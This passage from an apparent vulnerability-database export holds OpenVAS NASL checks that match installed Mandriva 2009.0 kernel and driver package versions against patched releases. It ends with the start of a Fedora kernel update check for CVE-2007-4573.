exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel\", rpm:\"nvidia-current-kernel~2.6.27.56~desktop~1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia-current-kernel-2.6.27.56-desktop586-1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-2.6.27.56-server\", rpm:\"nvidia-current-kernel-2.6.27.56-server~1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-desktop586-latest\", rpm:\"nvidia-current-kernel-desktop586-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-desktop-latest\", rpm:\"nvidia-current-kernel-desktop-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-server-latest\", rpm:\"nvidia-current-kernel-server-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omfs-kernel\", rpm:\"omfs-kernel~2.6.27.56~desktop~1mnb~0.8.0~1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omfs-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"omfs-kernel-2.6.27.56-desktop586-1mnb~0.8.0~1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omfs-kernel-2.6.27.56-server-1mnb\", rpm:\"omfs-kernel-2.6.27.56-server-1mnb~0.8.0~1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omfs-kernel-desktop586-latest\", rpm:\"omfs-kernel-desktop586-latest~0.8.0~1.20101216.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omfs-kernel-desktop-latest\", rpm:\"omfs-kernel-desktop-latest~0.8.0~1.20101216.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omfs-kernel-server-latest\", rpm:\"omfs-kernel-server-latest~0.8.0~1.20101216.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kernel\", rpm:\"omnibook-kernel~2.6.27.56~desktop~1mnb~20080513~0.274.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"omnibook-kernel-2.6.27.56-desktop586-1mnb~20080513~0.274.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kernel-2.6.27.56-server-1mnb\", rpm:\"omnibook-kernel-2.6.27.56-server-1mnb~20080513~0.274.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kernel-desktop586-latest-20080513\", rpm:\"omnibook-kernel-desktop586-latest-20080513~1.20101216.0.274.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kernel-desktop-latest-20080513\", rpm:\"omnibook-kernel-desktop-latest-20080513~1.20101216.0.274.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kernel-server-latest-20080513\", rpm:\"omnibook-kernel-server-latest-20080513~1.20101216.0.274.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opencbm-kernel\", rpm:\"opencbm-kernel~2.6.27.56~desktop~1mnb~0.4.2a~1mdv2008.1\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opencbm-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"opencbm-kernel-2.6.27.56-desktop586-1mnb~0.4.2a~1mdv2008.1\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opencbm-kernel-2.6.27.56-server-1mnb\", rpm:\"opencbm-kernel-2.6.27.56-server-1mnb~0.4.2a~1mdv2008.1\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opencbm-kernel-desktop586-latest\", rpm:\"opencbm-kernel-desktop586-latest~0.4.2a~1.20101216.1mdv2008.1\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opencbm-kernel-desktop-latest\", rpm:\"opencbm-kernel-desktop-latest~0.4.2a~1.20101216.1mdv2008.1\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opencbm-kernel-server-latest\", rpm:\"opencbm-kernel-server-latest~0.4.2a~1.20101216.1mdv2008.1\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ov51x-jpeg-kernel\", rpm:\"ov51x-jpeg-kernel~2.6.27.56~desktop~1mnb~1.5.9~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"ov51x-jpeg-kernel-2.6.27.56-desktop586-1mnb~1.5.9~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-2.6.27.56-server-1mnb\", rpm:\"ov51x-jpeg-kernel-2.6.27.56-server-1mnb~1.5.9~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-desktop586-latest\", rpm:\"ov51x-jpeg-kernel-desktop586-latest~1.5.9~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-desktop-latest\", rpm:\"ov51x-jpeg-kernel-desktop-latest~1.5.9~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-server-latest\", rpm:\"ov51x-jpeg-kernel-server-latest~1.5.9~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qc-usb-kernel\", rpm:\"qc-usb-kernel~2.6.27.56~desktop~1mnb~0.6.6~6mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qc-usb-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"qc-usb-kernel-2.6.27.56-desktop586-1mnb~0.6.6~6mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qc-usb-kernel-2.6.27.56-server-1mnb\", rpm:\"qc-usb-kernel-2.6.27.56-server-1mnb~0.6.6~6mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qc-usb-kernel-desktop586-latest\", rpm:\"qc-usb-kernel-desktop586-latest~0.6.6~1.20101216.6mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qc-usb-kernel-desktop-latest\", rpm:\"qc-usb-kernel-desktop-latest~0.6.6~1.20101216.6mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qc-usb-kernel-server-latest\", rpm:\"qc-usb-kernel-server-latest~0.6.6~1.20101216.6mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2860-kernel\", rpm:\"rt2860-kernel~2.6.27.56~desktop~1mnb~1.7.0.0~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2860-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"rt2860-kernel-2.6.27.56-desktop586-1mnb~1.7.0.0~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2860-kernel-2.6.27.56-server-1mnb\", rpm:\"rt2860-kernel-2.6.27.56-server-1mnb~1.7.0.0~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2860-kernel-desktop586-latest\", rpm:\"rt2860-kernel-desktop586-latest~1.7.0.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2860-kernel-desktop-latest\", rpm:\"rt2860-kernel-desktop-latest~1.7.0.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2860-kernel-server-latest\", rpm:\"rt2860-kernel-server-latest~1.7.0.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2870-kernel\", rpm:\"rt2870-kernel~2.6.27.56~desktop~1mnb~1.3.1.0~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2870-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"rt2870-kernel-2.6.27.56-desktop586-1mnb~1.3.1.0~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2870-kernel-2.6.27.56-server-1mnb\", rpm:\"rt2870-kernel-2.6.27.56-server-1mnb~1.3.1.0~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2870-kernel-desktop586-latest\", rpm:\"rt2870-kernel-desktop586-latest~1.3.1.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2870-kernel-desktop-latest\", rpm:\"rt2870-kernel-desktop-latest~1.3.1.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2870-kernel-server-latest\", rpm:\"rt2870-kernel-server-latest~1.3.1.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rtl8187se-kernel\", rpm:\"rtl8187se-kernel~2.6.27.56~desktop~1mnb~1016.20080716~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rtl8187se-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"rtl8187se-kernel-2.6.27.56-desktop586-1mnb~1016.20080716~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rtl8187se-kernel-2.6.27.56-server-1mnb\", rpm:\"rtl8187se-kernel-2.6.27.56-server-1mnb~1016.20080716~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rtl8187se-kernel-desktop586-latest\", rpm:\"rtl8187se-kernel-desktop586-latest~1016.20080716~1.20101216.1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rtl8187se-kernel-desktop-latest\", rpm:\"rtl8187se-kernel-desktop-latest~1016.20080716~1.20101216.1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rtl8187se-kernel-server-latest\", rpm:\"rtl8187se-kernel-server-latest~1016.20080716~1.20101216.1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"slmodem-kernel\", rpm:\"slmodem-kernel~2.6.27.56~desktop~1mnb~2.9.11~0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"slmodem-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"slmodem-kernel-2.6.27.56-desktop586-1mnb~2.9.11~0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"slmodem-kernel-2.6.27.56-server-1mnb\", rpm:\"slmodem-kernel-2.6.27.56-server-1mnb~2.9.11~0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"slmodem-kernel-desktop586-latest\", rpm:\"slmodem-kernel-desktop586-latest~2.9.11~1.20101216.0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"slmodem-kernel-desktop-latest\", rpm:\"slmodem-kernel-desktop-latest~2.9.11~1.20101216.0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"slmodem-kernel-server-latest\", rpm:\"slmodem-kernel-server-latest~2.9.11~1.20101216.0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"squashfs-lzma-kernel\", rpm:\"squashfs-lzma-kernel~2.6.27.56~desktop~1mnb~3.3~5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"squashfs-lzma-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"squashfs-lzma-kernel-2.6.27.56-desktop586-1mnb~3.3~5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"squashfs-lzma-kernel-2.6.27.56-server-1mnb\", rpm:\"squashfs-lzma-kernel-2.6.27.56-server-1mnb~3.3~5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"squashfs-lzma-kernel-desktop586-latest\", rpm:\"squashfs-lzma-kernel-desktop586-latest~3.3~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"squashfs-lzma-kernel-desktop-latest\", rpm:\"squashfs-lzma-kernel-desktop-latest~3.3~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"squashfs-lzma-kernel-server-latest\", rpm:\"squashfs-lzma-kernel-server-latest~3.3~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tp_smapi-kernel\", rpm:\"tp_smapi-kernel~2.6.27.56~desktop~1mnb~0.37~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tp_smapi-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"tp_smapi-kernel-2.6.27.56-desktop586-1mnb~0.37~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tp_smapi-kernel-2.6.27.56-server-1mnb\", rpm:\"tp_smapi-kernel-2.6.27.56-server-1mnb~0.37~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tp_smapi-kernel-desktop586-latest\", rpm:\"tp_smapi-kernel-desktop586-latest~0.37~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tp_smapi-kernel-desktop-latest\", rpm:\"tp_smapi-kernel-desktop-latest~0.37~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tp_smapi-kernel-server-latest\", rpm:\"tp_smapi-kernel-server-latest~0.37~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxadd-kernel\", rpm:\"vboxadd-kernel~2.6.27.56~desktop~1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxadd-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vboxadd-kernel-2.6.27.56-desktop586-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxadd-kernel-2.6.27.56-server-1mnb\", rpm:\"vboxadd-kernel-2.6.27.56-server-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxadd-kernel-desktop586-latest\", rpm:\"vboxadd-kernel-desktop586-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxadd-kernel-desktop-latest\", rpm:\"vboxadd-kernel-desktop-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxadd-kernel-server-latest\", rpm:\"vboxadd-kernel-server-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxvfs-kernel\", rpm:\"vboxvfs-kernel~2.6.27.56~desktop~1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxvfs-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vboxvfs-kernel-2.6.27.56-desktop586-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxvfs-kernel-2.6.27.56-server-1mnb\", rpm:\"vboxvfs-kernel-2.6.27.56-server-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxvfs-kernel-desktop586-latest\", rpm:\"vboxvfs-kernel-desktop586-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxvfs-kernel-desktop-latest\", rpm:\"vboxvfs-kernel-desktop-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vboxvfs-kernel-server-latest\", rpm:\"vboxvfs-kernel-server-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vhba-kernel\", rpm:\"vhba-kernel~2.6.27.56~desktop~1mnb~1.0.0~1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vhba-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vhba-kernel-2.6.27.56-desktop586-1mnb~1.0.0~1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vhba-kernel-2.6.27.56-server-1mnb\", rpm:\"vhba-kernel-2.6.27.56-server-1mnb~1.0.0~1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vhba-kernel-desktop586-latest\", rpm:\"vhba-kernel-desktop586-latest~1.0.0~1.20101216.1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vhba-kernel-desktop-latest\", rpm:\"vhba-kernel-desktop-latest~1.0.0~1.20101216.1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vhba-kernel-server-latest\", rpm:\"vhba-kernel-server-latest~1.0.0~1.20101216.1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-kernel\", rpm:\"virtualbox-kernel~2.6.27.56~desktop~1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"virtualbox-kernel-2.6.27.56-desktop586-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-kernel-2.6.27.56-server-1mnb\", rpm:\"virtualbox-kernel-2.6.27.56-server-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-kernel-desktop586-latest\", rpm:\"virtualbox-kernel-desktop586-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-kernel-desktop-latest\", rpm:\"virtualbox-kernel-desktop-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-kernel-server-latest\", rpm:\"virtualbox-kernel-server-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel\", rpm:\"vpnclient-kernel~2.6.27.56~desktop~1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vpnclient-kernel-2.6.27.56-desktop586-1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-2.6.27.56-server-1mnb\", rpm:\"vpnclient-kernel-2.6.27.56-server-1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-desktop586-latest\", rpm:\"vpnclient-kernel-desktop586-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-desktop-latest\", rpm:\"vpnclient-kernel-desktop-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-server-latest\", rpm:\"vpnclient-kernel-server-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia173-kernel\", rpm:\"nvidia173-kernel~2.6.27.56~server~1mnb~173.14.12~4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia173-kernel-server-latest\", rpm:\"nvidia173-kernel-server-latest~173.14.12~1.20101216.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:12", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2009-02-27T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2007-2298", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-4573"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:861315", "href": "http://plugins.openvas.org/nasl.php?oid=861315", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2007-2298\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = 